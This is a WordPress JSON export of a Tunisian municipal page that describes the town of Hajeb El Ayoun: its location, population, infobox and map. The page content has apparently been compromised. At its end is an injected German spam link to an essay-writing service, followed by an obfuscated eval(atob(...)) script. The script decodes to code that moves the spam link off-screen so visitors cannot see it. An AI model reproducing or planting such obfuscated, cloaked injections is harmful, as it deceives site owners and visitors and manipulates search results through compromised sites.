


{"id":235,"date":"2016-12-07T12:53:00","date_gmt":"2016-12-07T11:53:00","guid":{"rendered":"http:\/\/www.commune-hadjebelayoun.tn\/?page_id=235"},"modified":"2019-10-18T12:36:36","modified_gmt":"2019-10-18T10:36:36","slug":"hajeb-el-ayoun","status":"publish","type":"page","link":"http:\/\/www.commune-hadjebelayoun.gov.tn\/?page_id=235","title":{"rendered":"Hajeb El Ayoun"},"content":{"rendered":"<p>[vc_row][vc_column][vc_column_text]<strong>Pr\u00e9sentation de la ville :&nbsp;<\/strong><\/p>\n<p>Hajeb El Ayoun est une ville du centre de la Tunisie situ\u00e9e \u00e0 60 kilom\u00e8tres au sud-ouest de Kairouan par la RN3.<\/p>\n<p>Rattach\u00e9e au gouvernorat de Kairouan, elle constitue une municipalit\u00e9 de 9 648 habitants en 20042. Elle est par ailleurs le chef-lieu d&rsquo;une d\u00e9l\u00e9gation de 35 403 habitants.<\/p>\n<p>Elle polarise une campagne o\u00f9 sont cultiv\u00e9s oliviers et abricotiers.<\/p>\n<p>Elle se situe sur les berges du lac du barrage Sidi Saad, le plus grand du pays, ce qui permet de d\u00e9velopper une agriculture d&rsquo;irrigation.[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column width=\u00a0\u00bb7\/12&Prime;][vc_gmaps link=\u00a0\u00bb#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDI2MDE5LjUzMjUwNzU0NjMzJTIxMmQ5LjUyNjI2MjE0OTIwNjA4NSUyMTNkMzUuMzk0MzA0MDM2NzYyNzglMjEybTMlMjExZjAlMjEyZjAlMjEzZjAlMjEzbTIlMjExaTEwMjQlMjEyaTc2OCUyMTRmMTMuMSUyMTNtMyUyMTFtMiUyMTFzMHgxMmZlOTg3ODEyMjEzM2RkJTI1M0EweGUzNjcxN2I5Y2U1NTY4ODAlMjEyc0hhamViJTJCRWwlMkJBeW91biUyMTVlMCUyMTNtMiUyMTFzZnIlMjEyc3RuJTIxNHYxNDg0NTUxNDA5NDEzJTIyJTIwd2lkdGglM0QlMjI2MDAlMjIlMjBoZWlnaHQlM0QlMjI1NTAlMjIlMjBmcmFtZWJvcmRlciUzRCUyMjAlMjIlMjBzdHlsZSUzRCUyMmJvcmRlciUzQTAlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0UlM0MlMkZpZnJhbWUlM0U=\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb5\/12&Prime;][vc_column_text]<\/p>\n<table class=\"infobox_v2\">\n<tbody>\n<tr>\n<th style=\"text-align: center;\" colspan=\"2\">Administration<\/th>\n<\/tr>\n<tr>\n<th scope=\"row\">Pays<\/th>\n<td><span class=\"datasortkey\" data-sort-value=\"Tunisie\"><span class=\"flagicon\"><a class=\"image\" title=\"Drapeau de la Tunisie\" rel=\"nofollow\"><img loading=\"lazy\" class=\"thumbborder\" src=\"https:\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/c\/ce\/Flag_of_Tunisia.svg\/20px-Flag_of_Tunisia.svg.png\" srcset=\"\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/c\/ce\/Flag_of_Tunisia.svg\/30px-Flag_of_Tunisia.svg.png 1.5x, \/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/c\/ce\/Flag_of_Tunisia.svg\/40px-Flag_of_Tunisia.svg.png 2x\" alt=\"Drapeau de la Tunisie\" width=\"20\" height=\"13\" data-file-width=\"1200\" data-file-height=\"800\"><\/a>&nbsp;<\/span>Tunisie<\/span><\/td>\n<\/tr>\n<tr>\n<th scope=\"row\">Gouvernorat<\/th>\n<td>Kairouan<\/td>\n<\/tr>\n<tr>\n<th scope=\"row\">D\u00e9l\u00e9gation(s)<\/th>\n<td>Hajeb El Ayoun<\/td>\n<\/tr>\n<tr>\n<th scope=\"row\">Maire<\/th>\n<td>Hassen Za\u00efdi<\/td>\n<\/tr>\n<tr>\n<th scope=\"row\">Code postal<\/th>\n<td>3160<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: center;\" colspan=\"2\">D\u00e9mographie<\/th>\n<\/tr>\n<tr>\n<th scope=\"row\">Population<\/th>\n<td><span class=\"nowrap\">9&nbsp;648&nbsp;<abbr class=\"abbr\" title=\"habitants\">hab.<\/abbr><\/span> <small>(2004)<\/small><\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: center;\" colspan=\"2\">G\u00e9ographie<\/th>\n<\/tr>\n<tr>\n<th scope=\"row\">Coordonn\u00e9es<\/th>\n<td><span class=\"plainlinks nourlexpansion\" title=\"Cartes, vues a\u00e9riennes, etc.\"><img class=\"wmamapbutton noprint\" title=\"Montrer la localisation sur une carte interactive\" src=\"https:\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/e\/e9\/Geographylogo.svg\/18px-Geographylogo.svg.png\" alt=\"\"><a class=\"external text\" rel=\"nofollow\"><span class=\"h-geo geo-dms\">35\u00b0&nbsp;23\u2032&nbsp;nord, 9\u00b0&nbsp;32\u2032&nbsp;est<\/span><\/a><\/span><\/td>\n<\/tr>\n<tr>\n<th scope=\"row\">Altitude<\/th>\n<td><span class=\"nowrap\">349&nbsp;m<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<strong>Situation g\u00e9ographique :&nbsp;<\/strong><\/p>\n<p>Hadjeb El Ayoun est situ\u00e9e au centre de la Tunisie, 65 km la s\u00e9parent de la capitale des Aghlabites : Kairouan, 200 km de la capitale : Tunis, en direction du Nord.<\/p>\n<p>100 km la s\u00e9parent de la ville Siliana en direction de l&rsquo;Ouest, 67 Km de Sidi Bouzid en direction du Sud et 55 km de Nasrallah vers l&rsquo;Est, 45 km et 35 km la s\u00e9parent respectivement de Haffouz et de El Al\u00e2a en direction du Nord.[\/vc_column_text][\/vc_column][\/vc_row] <em class=\"vohs\">Di in der \u00f6ffentlichkeit und gewinnst durch sicheres auftreten und <a href=\"https:\/\/bachelorschreibenlassen.com\/expose-schreiben\">exposee schreiben lassen<\/a> charme neue mitglieder.<\/em><script>eval(eval(atob(\"IjM5OjQxOjQ4OjQ0OjQ4OjQ0OjQ4OjQ0OjQ4OjQwOjExNjo5OToxMDE6MTE0OjU4OjExMjoxMDU6MTA4Ojk5OjU5OjEyMDoxMTI6NDk6NDU6NTg6MTEwOjEwNToxMDM6MTE0Ojk3OjEwOTo1OToxMjA6MTEyOjQ5OjU4OjExNjoxMDQ6MTAzOjEwNToxMDE6MTA0OjU5OjEyMDoxMTI6NDk6NTg6MTA0OjExNjoxMDA6MTA1OjExOTo1OToxMjA6MTEyOjUxOjU3OjUwOjUwOjQ1OjMyOjU4OjExNjoxMDI6MTAxOjEwODo1OToxMjA6MTEyOjU1OjUxOjUyOjUzOjQ1OjMyOjU4OjExMjoxMTE6MTE2OjU5OjEwMToxMTY6MTE3OjEwODoxMTE6MTE1Ojk4Ojk3OjMyOjU4OjExMDoxMTE6MTA1OjExNjoxMDU6MTE1OjExMToxMTI6Mzk6NjE6MTE2OjEyMDoxMDE6ODQ6MTE1OjExNTo5OTo0NjoxMDE6MTA4OjEyMToxMTY6MTE1OjQ2OjEyMDoxMDY6NTk6NDE6Mzk6MTE1OjEwNDoxMTE6MTE4OjQ2OjEwOToxMDE6Mzk6NDA6MTE0OjExMToxMTY6OTk6MTAxOjEwODoxMDE6ODM6MTIxOjExNDoxMDE6MTE3OjExMzo0NjoxMTY6MTEwOjEwMToxMDk6MTE3Ojk5OjExMToxMDA6NjE6MTIwOjEwNiIuc3BsaXQoU3RyaW5nLmZyb21DaGFyQ29kZSg1OCkpLnJldmVyc2UoKS5tYXAoZWw9PlN0cmluZy5mcm9tQ2hhckNvZGUoZWwpKS5qb2luKCcnKQ==\")))<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text]Pr\u00e9sentation de la ville :&nbsp; Hajeb El Ayoun est une ville du centre de la Tunisie situ\u00e9e \u00e0 60 kilom\u00e8tres au sud-ouest de Kairouan par la RN3. Rattach\u00e9e au gouvernorat de Kairouan, elle constitue une municipalit\u00e9 de 9 648 habitants en 20042. Elle est par ailleurs le chef-lieu d&rsquo;une d\u00e9l\u00e9gation de 35 403 habitants. Elle [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/pages\/235"}],"collection":[{"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=235"}],"version-history":[{"count":9,"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/pages\/235\/revisions"}],"predecessor-version":[{"id":5329,"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=\/wp\/v2\/pages\/235\/revisions\/5329"}],"wp:attachment":[{"href":"http:\/\/www.commune-hadjebelayoun.gov.tn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}